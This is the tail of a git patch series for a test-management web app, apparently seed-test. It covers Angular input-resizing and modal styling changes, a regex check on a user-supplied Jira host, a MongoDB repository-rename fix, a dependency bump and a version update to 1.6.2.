width: 140%; - transform: translate(-11%, 0); + transform: translate(-14%, 0); } From 7ce46ac4341b991e488517df376479918764f287 Mon Sep 17 00:00:00 2001 From: Alice-cla Date: Wed, 23 Nov 2022 20:37:17 +0100 Subject: [PATCH 42/50] Resize input directive code smells removed --- .../app/directives/resize-input.directive.ts | 36 ++++++------------- 1 file changed, 11 insertions(+), 25 deletions(-) diff --git a/frontend/src/app/directives/resize-input.directive.ts b/frontend/src/app/directives/resize-input.directive.ts index f4bf94638..dd2486a63 100644 --- a/frontend/src/app/directives/resize-input.directive.ts +++ b/frontend/src/app/directives/resize-input.directive.ts @@ -19,11 +19,11 @@ export class ResizeInputDirective { @HostBinding() class?; @HostListener('change', ['$event']) onChange() { - this.resize('load'); + this.resize(); } @HostListener('input', ['$event']) onInput() { - this.resize('action'); + this.resize(); } @@ -40,19 +40,16 @@ export class ResizeInputDirective { if (this.class === 'background' || this.class === 'scenario') { this.maxWidth = this.containerEl.offsetWidth; } - this.resize('load'); + this.resize(); }, 1); } /** * Resize input filed in backgroung or scenario on input string length - * @param mode_type */ - private resize(mode_type: string) { + private resize() { //Set variables let parentWidth = this.setParentWidth(); - - let string_coef = 6; let string_length = this.el.nativeElement.value.length; let input_width = this.el.nativeElement.offsetWidth; let coef = 10; @@ -62,32 +59,21 @@ export class ResizeInputDirective { if (string_length <= 10 ){ this.el.nativeElement.setAttribute('size', this.minWidth); } else { - this.el.nativeElement.setAttribute('size', string_length-string_coef); + let width = (input_width)/coef; + this.el.nativeElement.setAttribute('size', width); } } else { let gap = (this.maxWidth - parentWidth); - if (gap >= 0){ - if (mode_type == 'action') { - this.el.nativeElement.setAttribute('size', this.el.nativeElement.getAttribute('size')); - } - if (mode_type == 'load') { - let width = (input_width + gap)/coef; - this.el.nativeElement.setAttribute('size', width); - } - } - else { - if (mode_type == 'action') { - this.el.nativeElement.setAttribute('size', this.el.nativeElement.getAttribute('size')+gap); - } - if (mode_type == 'load') { - let width = (input_width - gap)/coef; - this.el.nativeElement.setAttribute('size', width); - } + //Resize depending on gap between maximum width & width of resizable element + if (gap < 0) { + let width = (input_width - gap)/coef; + this.el.nativeElement.setAttribute('size', width); } } } + /** * Set parent width depending on class name * @returns From 3e74a2d061ce06db9998125317559844f96eb70f Mon Sep 17 00:00:00 2001 From: Alice-cla <81535134+Alice-cla@users.noreply.github.com> Date: Wed, 23 Nov 2022 20:52:17 +0100 Subject: [PATCH 43/50] Revert "Cuc 343 zentralisierte eingabefelder" --- .../app/base-editor/base-editor.component.css | 6 ---- .../base-editor/base-editor.component.html | 6 ++-- .../app/directives/resize-input.directive.ts | 35 ++++++++++++------- 3 files changed, 25 insertions(+), 22 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.css b/frontend/src/app/base-editor/base-editor.component.css index 364c819c7..ab79459a8 100644 --- a/frontend/src/app/base-editor/base-editor.component.css +++ b/frontend/src/app/base-editor/base-editor.component.css @@ -374,11 +374,5 @@ input[type="text"]{ color: red !important; } -input.scenario, input.background { - margin-left: 10px; - margin-right: 10px; - padding-left: 5px; - padding-right: 5px; -} \ No newline at end of file diff --git a/frontend/src/app/base-editor/base-editor.component.html b/frontend/src/app/base-editor/base-editor.component.html index 13b3bc160..42d5e0169 100644 --- a/frontend/src/app/base-editor/base-editor.component.html +++ b/frontend/src/app/base-editor/base-editor.component.html @@ -89,8 +89,8 @@
    - +
    @@ -122,7 +122,7 @@
    + type="text" value="{{currentStep.values[1]}}" on-input="addToValues(step_type_input2.value, j, 1, currentStep.stepType)" style="padding-left: 5px; padding-right: 5px;min-width: 100px"/>
    diff --git a/frontend/src/app/directives/resize-input.directive.ts b/frontend/src/app/directives/resize-input.directive.ts index dd2486a63..9b52cde75 100644 --- a/frontend/src/app/directives/resize-input.directive.ts +++ b/frontend/src/app/directives/resize-input.directive.ts @@ -19,11 +19,11 @@ export class ResizeInputDirective { @HostBinding() class?; @HostListener('change', ['$event']) onChange() { - this.resize(); + this.resize('action'); } @HostListener('input', ['$event']) onInput() { - this.resize(); + this.resize('action'); } @@ -40,40 +40,49 @@ export class ResizeInputDirective { if (this.class === 'background' || this.class === 'scenario') { this.maxWidth = this.containerEl.offsetWidth; } - this.resize(); + this.resize('load'); }, 1); } /** * Resize input filed in backgroung or scenario on input string length + * @param mode_type */ - private resize() { + private resize(mode_type: string) { //Set variables let parentWidth = this.setParentWidth(); - let string_length = this.el.nativeElement.value.length; + + let string_coef = 4; + let string_length = this.el.nativeElement.value.length+string_coef; let input_width = this.el.nativeElement.offsetWidth; let coef = 10; //Check if maxWidth exceeded if((parentWidth - input_width + string_length*coef) < this.maxWidth) { - if (string_length <= 10 ){ + if (string_length == 0 ){ this.el.nativeElement.setAttribute('size', this.minWidth); } else { - let width = (input_width)/coef; - this.el.nativeElement.setAttribute('size', width); + this.el.nativeElement.setAttribute('size', string_length); } } else { let gap = (this.maxWidth - parentWidth); - //Resize depending on gap between maximum width & width of resizable element - if (gap < 0) { - let width = (input_width - gap)/coef; - this.el.nativeElement.setAttribute('size', width); + if (gap > 0){ + + if (mode_type == 'action') { + this.el.nativeElement.setAttribute('size', this.el.nativeElement.getAttribute('size')); + } + if (mode_type == 'load') { + let width = (input_width + gap)/coef; + this.el.nativeElement.setAttribute('size', width); + } + } + else { + this.el.nativeElement.setAttribute('size', this.minWidth); } } } - /** * Set parent width depending on class name * @returns From fb916f6d95237fadc30bb41a798d60a866367833 Mon Sep 17 00:00:00 2001 From: Alice-cla Date: Wed, 23 Nov 2022 22:46:40 +0100 Subject: [PATCH 44/50] Resize input fix --- .../app/base-editor/base-editor.component.css | 6 ++++ .../app/directives/resize-input.directive.ts | 32 +++++++++---------- 2 files changed, 21 insertions(+), 17 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.css b/frontend/src/app/base-editor/base-editor.component.css index ab79459a8..364c819c7 100644 --- a/frontend/src/app/base-editor/base-editor.component.css +++ b/frontend/src/app/base-editor/base-editor.component.css @@ -374,5 +374,11 @@ input[type="text"]{ color: red !important; } +input.scenario, input.background { + margin-left: 10px; + margin-right: 10px; + padding-left: 5px; + padding-right: 5px; +} \ No newline at end of file diff --git a/frontend/src/app/directives/resize-input.directive.ts b/frontend/src/app/directives/resize-input.directive.ts index 9b52cde75..cb5d64e6b 100644 --- a/frontend/src/app/directives/resize-input.directive.ts +++ b/frontend/src/app/directives/resize-input.directive.ts @@ -19,11 +19,11 @@ export class ResizeInputDirective { @HostBinding() class?; @HostListener('change', ['$event']) onChange() { - this.resize('action'); + this.resize(); } @HostListener('input', ['$event']) onInput() { - this.resize('action'); + this.resize(); } @@ -48,39 +48,37 @@ export class ResizeInputDirective { * Resize input filed in backgroung or scenario on input string length * @param mode_type */ - private resize(mode_type: string) { + private resize(mode_type?: string) { //Set variables let parentWidth = this.setParentWidth(); - let string_coef = 4; let string_length = this.el.nativeElement.value.length+string_coef; let input_width = this.el.nativeElement.offsetWidth; let coef = 10; - + let gap = (this.maxWidth - parentWidth); + //Check if maxWidth exceeded if((parentWidth - input_width + string_length*coef) < this.maxWidth) { - if (string_length == 0 ){ + if (string_length <= 10 ){ this.el.nativeElement.setAttribute('size', this.minWidth); } else { - this.el.nativeElement.setAttribute('size', string_length); + this.el.nativeElement.setAttribute('size', string_length-string_coef); } - } + } else { - let gap = (this.maxWidth - parentWidth); - if (gap > 0){ - - if (mode_type == 'action') { - this.el.nativeElement.setAttribute('size', this.el.nativeElement.getAttribute('size')); - } + if (gap >= 0){ if (mode_type == 'load') { let width = (input_width + gap)/coef; this.el.nativeElement.setAttribute('size', width); } - } + } else { - this.el.nativeElement.setAttribute('size', this.minWidth); + if (mode_type == 'load') { + let width = (input_width - gap)/coef; + this.el.nativeElement.setAttribute('size', width); + } } - } + } } /** From 4f7d53e7a8bb687df70617c64ce27e114b4f6f30 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?K=C3=B6hler=2C=20Jonathan?= Date: Fri, 25 Nov 2022 11:21:37 +0100 Subject: [PATCH 45/50] solve RSF --- backend/src/serverRouter/jiraRouter.js | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/backend/src/serverRouter/jiraRouter.js b/backend/src/serverRouter/jiraRouter.js index e80c4c22e..b0963f495 100644 --- a/backend/src/serverRouter/jiraRouter.js +++ b/backend/src/serverRouter/jiraRouter.js @@ -41,9 +41,8 @@ router.post('/user/create/', (req, res) => { Authorization: `Basic ${auth}` } }; - const re = new RegExp('^[.:a-zA-Z0-9]+$');//jiraHost must only consist of letters, numbes, '.' and ':' to represent URLs or IPs and ports - const jiraHost_forgeCheck = re.test(jiraHost); - if(jiraHost_forgeCheck){ + + if(RegExp('^[.:a-zA-Z0-9]+$').test(jiraHost)){//jiraHost must only consist of letters, numbers, '.' and ':' to represent URLs or IPs and ports const jiraURL = `http://${jiraHost}/rest/auth/1/session` fetch(jiraURL, options) .then((response) => response.json()) @@ -83,7 +82,8 @@ router.post('/login', (req, res) => { Authorization: `Basic ${auth}` } }; - fetch(`http://${jiraServer}/rest/auth/1/session`, options) + if(RegExp('^[.:a-zA-Z0-9]+$').test(jiraHost)){ + fetch(`http://${jiraServer}/rest/auth/1/session`, options) .then((response, error) => { if (error) { res.status(500); @@ -96,6 +96,11 @@ router.post('/login', (req, res) => { console.log('Jira-Login failed'); } }); + }else { + console.error('Given JiraHost does not comply with URL structure.'); + res.status(401) + .json('Given JiraHost does not comply with URL structure.'); + } } else { res.status(500); console.log('No Jira Account sent'); From 30cec9c74ee607df179a7b8a23b5d6e5d9d5ef4c Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Fri, 25 Nov 2022 11:54:08 +0100 Subject: [PATCH 46/50] Bug fix --- frontend/src/app/report/report.component.ts | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) diff --git a/frontend/src/app/report/report.component.ts b/frontend/src/app/report/report.component.ts index f733fd6a9..2841bfb38 100644 --- a/frontend/src/app/report/report.component.ts +++ b/frontend/src/app/report/report.component.ts @@ -27,10 +27,6 @@ export class ReportComponent implements OnInit { reportId; reportIsSaved; - - counter: number; - - length: number; /** * html report of the result */ @@ -153,12 +149,11 @@ export class ReportComponent implements OnInit { html2canvas(body).then(canvas => { - var imgData = canvas.toDataURL("image/jpeg", 1.0); - var margin = 2; - var imgWidth = 210 - 2*margin; - var pageHeight = 295; - var imgHeight = canvas.height * imgWidth / canvas.width-10; - var heightLeft = imgHeight; + const imgData = canvas.toDataURL("image/jpeg", 1.0); + let imgWidth = 206; + let pageHeight = 295; + let imgHeight = canvas.height * imgWidth / canvas.width-10; + let heightLeft = imgHeight; let doc = new jsPDF('p', 'mm', 'a4'); let position = 0; From 6478e34f09e37de35bbcc29174079d74ed809394 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?K=C3=B6hler=2C=20Jonathan?= Date: Wed, 30 Nov 2022 13:42:17 +0100 Subject: [PATCH 47/50] correctly change project(repo) name --- backend/src/database/DbServices.js | 2 +- backend/src/serverRouter/userRouter.js | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/backend/src/database/DbServices.js b/backend/src/database/DbServices.js index 4acfdb89b..6d34d0443 100644 --- a/backend/src/database/DbServices.js +++ b/backend/src/database/DbServices.js @@ -782,7 +782,7 @@ async function updateRepository(repoID, newName, user) { const repoFilter = { owner: ObjectId(user), _id: ObjectId(repoID) }; const db = dbConnection.getConnection(); const collection = await db.collection(repositoriesCollection); - return collection.findOneAndUpdate(repoFilter, { $set: {"repo.repoName": newName} }); + return collection.findOneAndUpdate(repoFilter, { $set: {"repoName": newName} }, { returnNewDocument: true }); } catch (e) { console.log(`ERROR updateRepository: ${e}`); throw e; diff --git a/backend/src/serverRouter/userRouter.js b/backend/src/serverRouter/userRouter.js index 1b8d80b53..7ba23db6f 100644 --- a/backend/src/serverRouter/userRouter.js +++ b/backend/src/serverRouter/userRouter.js @@ -202,9 +202,9 @@ router.get('/repositories', (req, res) => { // update repository router.put('/repository/:repo_id/:owner_id', async (req, res) => { - const repo = await mongo.updateRepository(req.params.repo_id, req.body, req.params.owner_id); + const repo = await mongo.updateRepository(req.params.repo_id, req.body.repoName, req.params.owner_id); res.status(200).json(repo); - console.log(repo); + console.log('update repo: ',repo); }); // delete repository From 92dca5daa6e2bd99143a586566f643c93da82411 Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Thu, 1 Dec 2022 21:29:45 +0100 Subject: [PATCH 48/50] Update add-block component --- .../add-block-form.component.css | 18 +++++++++++++----- .../add-block-form/add-block-form.component.ts | 2 +- 2 files changed, 14 insertions(+), 6 deletions(-) diff --git a/frontend/src/app/modals/add-block-form/add-block-form.component.css b/frontend/src/app/modals/add-block-form/add-block-form.component.css index 42af4c467..27891d27f 100644 --- a/frontend/src/app/modals/add-block-form/add-block-form.component.css +++ b/frontend/src/app/modals/add-block-form/add-block-form.component.css @@ -89,6 +89,18 @@ td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type{ } } +@media screen and (min-width: 500px){ + + ::ng-deep body > ngb-modal-window > .addBlock.modal-dialog { + max-width: none !important; + } +} + +::ng-deep body > ngb-modal-window > .addBlock.modal-dialog { + width: 80%; + min-width: 1000px; +} + ::-webkit-scrollbar-thumb { background: #90CAF9; } @@ -103,8 +115,4 @@ td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type{ justify-content: center; align-items: center; -} -::ng-deep .modal-content{ - width: 140%; - transform: translate(-14%, 0); -} +} \ No newline at end of file diff --git a/frontend/src/app/modals/add-block-form/add-block-form.component.ts b/frontend/src/app/modals/add-block-form/add-block-form.component.ts index 448d01b71..50f64efde 100644 --- a/frontend/src/app/modals/add-block-form/add-block-form.component.ts +++ b/frontend/src/app/modals/add-block-form/add-block-form.component.ts @@ -61,7 +61,7 @@ export class AddBlockFormComponent { openAddBlockFormModal(correspondingComponent: string, repoId: string) { this.getAllBlocks(repoId); this.correspondingComponent = correspondingComponent; - this.modalReference = this.modalService.open(this.addBlockFormModal, {ariaLabelledBy: 'modal-basic-title', size: 'sm'}); + this.modalReference = this.modalService.open(this.addBlockFormModal, {ariaLabelledBy: 'modal-basic-title', modalDialogClass: 'addBlock'}); if (this.correspondingComponent == 'background') { this.clipboardBlock = JSON.parse(sessionStorage.getItem('backgroundBlock')); } else if (this.correspondingComponent == 'scenario') { From 1ae62f31608dc11b3c3454aa7d33faa44656823c Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Sun, 4 Dec 2022 17:54:49 +0000 Subject: [PATCH 49/50] Bump decode-uri-component from 0.2.0 to 0.2.2 in /frontend Bumps [decode-uri-component](https://github.com/SamVerschueren/decode-uri-component) from 0.2.0 to 0.2.2. - [Release notes](https://github.com/SamVerschueren/decode-uri-component/releases) - [Commits](https://github.com/SamVerschueren/decode-uri-component/compare/v0.2.0...v0.2.2) --- updated-dependencies: - dependency-name: decode-uri-component dependency-type: indirect ... Signed-off-by: dependabot[bot] --- frontend/package-lock.json | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/frontend/package-lock.json b/frontend/package-lock.json index d685096bf..bccbf5595 100644 --- a/frontend/package-lock.json +++ b/frontend/package-lock.json @@ -7129,8 +7129,9 @@ "integrity": "sha512-ic1yEvwT6GuvaYwBLLY6/aFFgjZdySKTE8en/fkU3QICTmRtgtSlFn0u0BXN06InZwtfCelR7j8LRiDI/02iGA==" }, "node_modules/decode-uri-component": { - "version": "0.2.0", - "license": "MIT", + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/decode-uri-component/-/decode-uri-component-0.2.2.tgz", + "integrity": "sha512-FqUYQ+8o158GyGTrMFJms9qh3CqTKvAqgqsTnkLI8sKu0028orqBhxNMFkFen0zGyg6epACD32pjVk58ngIErQ==", "engines": { "node": ">=0.10" } @@ -22758,7 +22759,9 @@ "integrity": "sha512-ic1yEvwT6GuvaYwBLLY6/aFFgjZdySKTE8en/fkU3QICTmRtgtSlFn0u0BXN06InZwtfCelR7j8LRiDI/02iGA==" }, "decode-uri-component": { - "version": "0.2.0" + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/decode-uri-component/-/decode-uri-component-0.2.2.tgz", + "integrity": "sha512-FqUYQ+8o158GyGTrMFJms9qh3CqTKvAqgqsTnkLI8sKu0028orqBhxNMFkFen0zGyg6epACD32pjVk58ngIErQ==" }, "dedent": { "version": "0.7.0", From 6a599c9b46ad6101b0f700f0c3ebb15e734ed53b Mon Sep 17 00:00:00 2001 From: Daniel Sorna Date: Sun, 4 Dec 2022 20:29:37 +0100 Subject: [PATCH 50/50] update Version to 1.6.2 --- backend/package.json | 2 +- frontend/package.json | 2 +- frontend/src/app/app.component.html | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/backend/package.json b/backend/package.json index 088788422..7734a3393 100644 --- a/backend/package.json +++ b/backend/package.json @@ -1,6 +1,6 @@ { "name": "seed-test-backend", - "version": "1.6.1", + "version": "1.6.2", "engines": { "node": "16.17.0" }, diff --git a/frontend/package.json b/frontend/package.json index 78263052b..2f9f1498b 100644 --- a/frontend/package.json +++ b/frontend/package.json @@ -1,6 +1,6 @@ { "name": "seed-test-frontend", - "version": "1.6.1", + "version": "1.6.2", "engines": { "node": "16.17.0" }, diff --git a/frontend/src/app/app.component.html b/frontend/src/app/app.component.html index 15bcc246a..95fc4b0d2 100644 --- a/frontend/src/app/app.component.html +++ b/frontend/src/app/app.component.html @@ -29,7 +29,7 @@
-

Version 1.6.1

+

Version 1.6.2